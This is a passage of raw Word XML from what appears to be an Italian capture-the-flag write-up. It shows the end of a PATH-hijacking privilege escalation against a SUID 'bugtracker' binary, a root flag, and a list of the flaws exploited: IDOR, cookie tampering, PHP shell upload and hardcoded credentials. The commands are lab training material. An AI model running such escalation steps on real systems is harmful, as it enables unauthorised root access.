        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x cat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">export PATH=/tmp:$PATH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/bugtracker   # inserire 1 come Bug ID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell root ottenuta. Root flag:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C1C" w:val="clear"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1ABC9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">af13b0bee69f8a877c3faf667f7beacf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Vulnerabilità Sfruttate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IDOR (Insecure Direct Object Reference) — accesso a risorse di altri utenti tramite manipolazione dell'ID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie manipulation — modifica lato client dei cookie di sessione per privilege escalation web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unrestricted File Upload — upload di PHP shell senza validazione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hardcoded Credentials — credenziali database in chiaro nel codice sorgente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH Hijacking su SUID — abuso di binario SUID che chiama comandi senza path assoluto</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sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="120" w:before="240"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>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2026-04-09T19:37:56.938Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-09T19:37:56.939Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>